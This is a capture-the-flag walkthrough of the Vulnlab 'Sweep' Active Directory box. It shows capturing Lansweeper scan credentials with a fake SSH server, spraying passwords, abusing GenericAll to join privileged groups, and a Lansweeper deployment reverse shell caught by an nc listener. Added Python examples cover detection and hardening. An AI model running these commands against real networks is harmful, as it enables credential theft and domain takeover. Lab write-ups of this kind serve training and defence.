Here are my notes on the SWEEP box from Vulnlab, which was deployed to HackTheBox.
SWEEP: 10.10.72.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
#Login requires Windows AD creds or workstation local creds.
intern:intern
#Add Kali as a scan target.
#Map the Linux scanning credential (Inventory_Linux) to that target, so Lansweeper authenticates to Kali with it.
svc_inventory_lnx #For example, the account behind that credential.
SSH Credential Sniffing:
go install github.com/fffaraz/fakessh@latest
sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
./fakessh
Click Scanning Queue
┌──(root㉿kali)-[~/go/bin]
└─# ./fakessh
2024/03/06 15:05:49.881491 10.10.72.126:52694
2024/03/06 15:05:51.039436 10.10.72.126:52706
2024/03/06 15:05:51.540093 10.10.72.126:52708
2024/03/06 15:05:52.021397 10.10.72.126:52708 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX
svc_inventory_lnx:0|5m-U6?/uAX
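The capture above works because a password-based scanning credential is handed to whatever host sits in the scanning queue, so a scan target you do not control receives the password. A check a defender can run before the scan starts is to reject targets outside the ranges the credential is meant for. This is an added example, not code from the notes or from Lansweeper; the allowlisted ranges and the queue entries are constructed (10.8.0.71 is the listener address from the reverse-shell output later in the notes, the rest are made up).

```python
"""Reject Lansweeper-style scan targets that fall outside approved asset ranges.

Added example, not from the original notes or from Lansweeper. APPROVED_RANGES
and SCAN_QUEUE are constructed values.
"""
import ipaddress

# Constructed allowlist: the ranges the Linux scanning credential may be used against.
APPROVED_RANGES = [
    ipaddress.ip_network("10.10.72.0/24"),
    ipaddress.ip_network("192.168.115.0/24"),
]

# Constructed scanning queue. 10.8.0.71 is an untrusted host (the listener
# address seen later in the notes); "not-an-ip" shows how bad input is handled.
SCAN_QUEUE = [
    {"target": "10.10.72.126", "credential": "svc_inventory_lnx"},
    {"target": "192.168.115.145", "credential": "svc_inventory_lnx"},
    {"target": "10.8.0.71", "credential": "svc_inventory_lnx"},
    {"target": "not-an-ip", "credential": "svc_inventory_lnx"},
]


def is_approved(target, approved=APPROVED_RANGES):
    """Return True only if target parses as an IP address inside an approved range."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        # Hostnames and garbage are rejected outright; resolve them first if
        # you want to allow DNS names, and validate the resolved address.
        return False
    return any(addr in net for net in approved)


def leaking_entries(queue, approved=APPROVED_RANGES):
    """Return the queue entries whose credential would be sent to an unapproved host."""
    return [entry for entry in queue if not is_approved(entry["target"], approved)]


if __name__ == "__main__":
    for entry in leaking_entries(SCAN_QUEUE):
        print(f"BLOCK: {entry['credential']} would authenticate to {entry['target']}")
```

The allowlist only limits where the password goes; it does not remove the underlying problem that a password is sent to any host that answers on port 22. Key-based scanning credentials, or a dedicated low-privilege scan account that is not a domain user, reduce what a capture like the one above is worth.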
PRIV ESC:
#Lansweeper Admin privilege required.
net group "Domain Admins" svc_inventory_lnx /add /domain
Login back to Lansweeper with svc_inventory_lnx:0|5m-U6?/uAX
We created a new credential mapping, this time of type Windows Computer, for sweep\inventory using the Inventory Windows credential.
Then go to the deployment section and add a package named test.
Then enable RCE in the test package and apply it to the INVENTORY asset with a PowerShell payload.
#revshell.sh
Wait to get a SYSTEM shell.
https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/sweep/Sweep.md#privilege-escalation
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.127.24] 55760
PS C:\Windows\system32> whoami
nt authority\system
SYSTEM-SHELL !
PS C:\Users\Administrator\Desktop> whoami
nt authority\system
PS C:\Users\Administrator\Desktop> hostname
inventory
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/8/2024 12:44 PM 36 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
#Same as port 81.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-06 18:12:43Z)
-No AS-REP roasting.
bloodhound-python -c All -u intern -p intern -d sweep.vl --dns-tcp -ns 10.10.72.126
#Nothing useful for the intern user.
svc_inventory_lnx is a member of Lansweeper Discovery, which has GenericAll over Lansweeper Admins; Lansweeper Admins can PSRemote to the target.
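The chain above is what BloodHound draws as a path: a membership edge, an ACL edge and a remoting edge. The breadth-first search below is an added example (not from the notes and not BloodHound's code) that finds such a path over a constructed edge list and shows that removing the single GenericAll edge severs it, which is the fix a defender would make. Node names follow the notes; the edge set is an assumption.

```python
"""Find a privilege path through AD relationships and check which edge to remove.

Added example, not from the notes or from BloodHound. EDGES is constructed from
the relationship described in the notes plus a couple of made-up nodes.
"""
from collections import deque

# Constructed edges: (source, relationship, target).
EDGES = [
    ("SVC_INVENTORY_LNX@SWEEP.VL", "MemberOf", "LANSWEEPER DISCOVERY@SWEEP.VL"),
    ("LANSWEEPER DISCOVERY@SWEEP.VL", "GenericAll", "LANSWEEPER ADMINS@SWEEP.VL"),
    ("LANSWEEPER ADMINS@SWEEP.VL", "CanPSRemote", "INVENTORY.SWEEP.VL"),
    ("JGRE808@SWEEP.VL", "MemberOf", "LANSWEEPER ADMINS@SWEEP.VL"),
    ("INTERN@SWEEP.VL", "MemberOf", "DOMAIN USERS@SWEEP.VL"),
]

# Relationship kinds that give the source effective control of the target.
CONTROL_EDGES = {"MemberOf", "GenericAll", "CanPSRemote", "AdminTo"}


def build_graph(edges):
    """Adjacency list restricted to control edges."""
    graph = {}
    for src, kind, dst in edges:
        if kind in CONTROL_EDGES:
            graph.setdefault(src, []).append((kind, dst))
    return graph


def shortest_path(edges, start, goal):
    """Return the shortest path as a list of (src, kind, dst) hops, or None."""
    graph = build_graph(edges)
    prev = {start: None}  # node -> (previous node, edge kind)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for kind, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, kind)
                queue.append(nxt)
    if goal not in prev:
        return None
    hops = []
    node = goal
    while prev[node] is not None:
        src, kind = prev[node]
        hops.append((src, kind, node))
        node = src
    return list(reversed(hops))


def without_edge_kind(edges, kind_to_drop):
    """Simulate the remediation of removing every edge of one kind."""
    return [e for e in edges if e[1] != kind_to_drop]


if __name__ == "__main__":
    start, goal = "SVC_INVENTORY_LNX@SWEEP.VL", "INVENTORY.SWEEP.VL"
    for src, kind, dst in shortest_path(EDGES, start, goal) or []:
        print(f"{src} -[{kind}]-> {dst}")
    print("after removing GenericAll:", shortest_path(without_edge_kind(EDGES, "GenericAll"), start, goal))
```

On a real graph the same search is run from every low-privilege principal toward Tier-0 assets; the edges that appear in the most paths (here the discovery group's GenericAll over the admin group) are the ones worth removing first.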
net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
net rpc group members "LANSWEEPER ADMINS" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# net rpc group members "LANSWEEPER ADMINS" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
SWEEP\jgre808
SWEEP\svc_inventory_lnx
net rpc group members "Domain Admins" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
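The group add above is exactly the kind of change a domain controller logs (Security event 4728 for a global group, 4732 for a local group, 4756 for a universal group), and the actor adding itself to a privileged group is the signal to alert on. The detection below is an added example, not from the notes; the sample events are constructed in a simplified key=value form, not real Windows export output, and the list of approved actors is an assumption.

```python
"""Flag additions to privileged AD groups, especially self-additions.

Added example, not from the notes. SAMPLE_EVENTS are constructed lines in a
simplified key=value format; APPROVED_ACTORS is an assumed allowlist.
"""
import re

# Real Windows Security event IDs for "member added to a security-enabled group".
GROUP_ADD_EVENTS = {4728, 4732, 4756}
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "lansweeper admins"}
APPROVED_ACTORS = {"SWEEP\\Administrator"}  # assumed: the accounts allowed to touch these groups

# Constructed sample events (not taken from the box).
SAMPLE_EVENTS = [
    'EventID=4728 SubjectUser=SWEEP\\svc_inventory_lnx Group="LANSWEEPER ADMINS" Member=CN=svc_inventory_lnx,CN=Users,DC=sweep,DC=vl',
    'EventID=4728 SubjectUser=SWEEP\\Administrator Group="Domain Admins" Member=CN=jgre808,CN=Users,DC=sweep,DC=vl',
    'EventID=4728 SubjectUser=SWEEP\\helpdesk Group="Helpdesk Staff" Member=CN=intern,CN=Users,DC=sweep,DC=vl',
    'EventID=4624 SubjectUser=SWEEP\\intern LogonType=3',
]

EVENT_RE = re.compile(
    r'EventID=(?P<id>\d+) SubjectUser=(?P<subject>\S+) Group="(?P<group>[^"]+)" Member=(?P<member>\S+)'
)


def parse_event(line):
    """Parse one constructed event line; return a dict or None for non-group events."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["id"] = int(ev["id"])
    return ev


def member_sam(dn):
    """'CN=jgre808,CN=Users,DC=sweep,DC=vl' -> 'jgre808'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def suspicious_additions(lines, approved_actors=APPROVED_ACTORS):
    """Return findings for privileged-group additions by unapproved actors or self-adds."""
    approved = {a.lower() for a in approved_actors}
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["id"] not in GROUP_ADD_EVENTS:
            continue
        if ev["group"].lower() not in PRIVILEGED_GROUPS:
            continue
        actor = ev["subject"].split("\\")[-1]
        member = member_sam(ev["member"])
        reasons = []
        if ev["subject"].lower() not in approved:
            reasons.append("actor not approved to change privileged groups")
        if actor.lower() == member.lower():
            reasons.append("actor added itself")
        if reasons:
            findings.append({"actor": actor, "group": ev["group"], "member": member, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_additions(SAMPLE_EVENTS):
        print(f"ALERT: {f['actor']} added {f['member']} to {f['group']}: {'; '.join(f['reasons'])}")
```

Only the svc_inventory_lnx line trips the rule: it is an unapproved actor and a self-add, the pattern produced by abusing GenericAll over a group you are not in.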
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec winrm 10.10.72.126 -u svc_inventory_lnx -p '0|5m-U6?/uAX'
SMB 10.10.72.126 5985 INVENTORY [*] Windows 10.0 Build 20348 (name:INVENTORY) (domain:sweep.vl)
HTTP 10.10.72.126 5985 INVENTORY [*] http://10.10.72.126:5985/wsman
WINRM 10.10.72.126 5985 INVENTORY [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX (Pwn3d!)
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/8/2024 11:50 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/11/2024 1:30 AM Program Files
d----- 2/8/2024 12:17 PM Program Files (x86)
d-r--- 3/6/2024 12:28 PM Users
d----- 2/11/2024 1:43 AM Windows
-a---- 2/8/2024 12:43 PM 36 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
USER SHELL !
https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/sweep/Sweep.md
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# sudo impacket-rpcdump @10.10.72.126 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# rpcclient --user="" --command=srvinfo -N 10.10.72.126
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# rpcclient --user="" --command=getdompwinfo -N 10.10.72.126
result was NT_STATUS_ACCESS_DENIED
#NOPE.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# smbclient -N -L 10.10.72.126
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DefaultPackageShare$ Disk Lansweeper PackageShare
IPC$ IPC Remote IPC
Lansweeper$ Disk Lansweeper Actions
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.72.126 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u guest -p '' --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\guest:
SMB 10.10.72.126 445 INVENTORY [+] Enumerated shares
SMB 10.10.72.126 445 INVENTORY Share Permissions Remark
SMB 10.10.72.126 445 INVENTORY ----- ----------- ------
SMB 10.10.72.126 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.72.126 445 INVENTORY C$ Default share
SMB 10.10.72.126 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.72.126 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.72.126 445 INVENTORY Lansweeper$ Lansweeper Actions
SMB 10.10.72.126 445 INVENTORY NETLOGON Logon server share
SMB 10.10.72.126 445 INVENTORY SYSVOL Logon server share
┌──(root㉿kali)-[/home/…/COMP/SWEEP/10.10.72.126/JUNK]
└─# smbclient \\\\10.10.72.126\\DefaultPackageShare$ -U "Guest"
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 8 14:46:04 2024
.. D 0 Thu Feb 8 14:47:44 2024
Images D 0 Thu Feb 8 14:46:08 2024
Installers D 0 Thu Feb 8 14:46:04 2024
Scripts D 0 Thu Feb 8 14:46:08 2024
5078271 blocks of size 4096. 599980 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \Images\WindowsLS.jpg of size 132382 as Images/WindowsLS.jpg (105.8 KiloBytes/sec) (average 105.8 KiloBytes/sec)
getting file \Scripts\CmpDesc.vbs of size 1119 as Scripts/CmpDesc.vbs (1.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)
getting file \Scripts\CopyFile.vbs of size 728 as Scripts/CopyFile.vbs (1.0 KiloBytes/sec) (average 47.5 KiloBytes/sec)
getting file \Scripts\Wallpaper.vbs of size 1245 as Scripts/Wallpaper.vbs (2.1 KiloBytes/sec) (average 39.8 KiloBytes/sec)
smb: \>
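The guest enumeration above is worth turning into a repeatable check: which shares does an unauthenticated or guest session get READ or WRITE on, other than IPC$. The parser below is an added example, not from the notes or from crackmapexec; it reads the whitespace-collapsed crackmapexec share table exactly as it appears in the notes (the sample text is copied from the guest run above) and lists the shares that are exposed.

```python
"""List shares a guest session can read or write from crackmapexec --shares output.

Added example, not from the notes or from crackmapexec. SAMPLE_CME_OUTPUT is
the guest share listing from the notes with whitespace collapsed.
"""

SAMPLE_CME_OUTPUT = """\
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\\guest:
SMB 10.10.72.126 445 INVENTORY [+] Enumerated shares
SMB 10.10.72.126 445 INVENTORY Share Permissions Remark
SMB 10.10.72.126 445 INVENTORY ----- ----------- ------
SMB 10.10.72.126 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.72.126 445 INVENTORY C$ Default share
SMB 10.10.72.126 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.72.126 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.72.126 445 INVENTORY Lansweeper$ Lansweeper Actions
SMB 10.10.72.126 445 INVENTORY NETLOGON Logon server share
SMB 10.10.72.126 445 INVENTORY SYSVOL Logon server share
"""

# Permission tokens crackmapexec prints in the second column; absent means no access.
PERMS = {"READ", "WRITE", "READ,WRITE"}


def parse_shares(text):
    """Return [{name, perms, remark}] for every row of the share table."""
    shares = []
    in_table = False
    for line in text.splitlines():
        parts = line.split()
        # Columns: SMB <ip> <port> <host> <share-table columns...>
        if len(parts) < 5 or parts[0] != "SMB":
            continue
        rest = parts[4:]
        if rest[0] == "Share" and len(rest) > 1 and rest[1] == "Permissions":
            in_table = True
            continue
        if not in_table or rest[0].startswith("-"):
            continue
        name = rest[0]
        # The permission column is empty when the session has no access, so the
        # remark shifts left; detect that by checking the second token.
        perms = rest[1] if len(rest) > 1 and rest[1] in PERMS else ""
        remark = " ".join(rest[2:] if perms else rest[1:])
        shares.append({"name": name, "perms": perms, "remark": remark})
    return shares


def exposed_shares(text, ignore=("IPC$",)):
    """Shares the session can read or write, excluding IPC$ which is always reachable."""
    return [s for s in parse_shares(text) if s["perms"] and s["name"] not in ignore]


if __name__ == "__main__":
    for s in exposed_shares(SAMPLE_CME_OUTPUT):
        print(f"EXPOSED: {s['name']} ({s['perms']}) - {s['remark']}")
```

Run against the guest listing it reports only DefaultPackageShare$, which is the share the deployment scripts were pulled from; a guest-readable package share is also where a Lansweeper deployment package would be staged, so it deserves the same access review as a software distribution point.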
#No common passwords.
#No LLMNR Poisoning.
crackmapexec smb 10.10.72.126 -u users.txt -p users.txt --continue-on-success
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\intern:intern
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u intern -p intern --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\intern:intern
SMB 10.10.72.126 445 INVENTORY [+] Enumerated shares
SMB 10.10.72.126 445 INVENTORY Share Permissions Remark
SMB 10.10.72.126 445 INVENTORY ----- ----------- ------
SMB 10.10.72.126 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.72.126 445 INVENTORY C$ Default share
SMB 10.10.72.126 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.72.126 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.72.126 445 INVENTORY Lansweeper$ READ Lansweeper Actions
SMB 10.10.72.126 445 INVENTORY NETLOGON READ Logon server share
SMB 10.10.72.126 445 INVENTORY SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u svc_inventory_lnx -p '0|5m-U6?/uAX' --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
LDAPv3 - dead end, nothing useful.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-06T18:13:43+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-06T18:13:05+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
9524/tcp open ssl/unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Content-Length: 1
| Connection: close
| Content-Type: text/html
| Date: Wed, 06 Mar 2024 18:19:19 GMT
| Server: Kestrel
| api-supported-versions: 1.0
| TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Wed, 06 Mar 2024 18:19:39 GMT
|_ Server: Kestrel
| ssl-cert: Subject: commonName=lansweeper-server-communication
| Subject Alternative Name: DNS:localhost, DNS:INVENTORY, DNS:inventory.sweep.vl, IP Address:192.168.115.145
| Not valid before: 2024-02-08T19:51:08
|_Not valid after: 3024-02-08T19:51:08
|_ssl-date: 2024-03-06T18:21:01+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
#No Lansweeper exploit.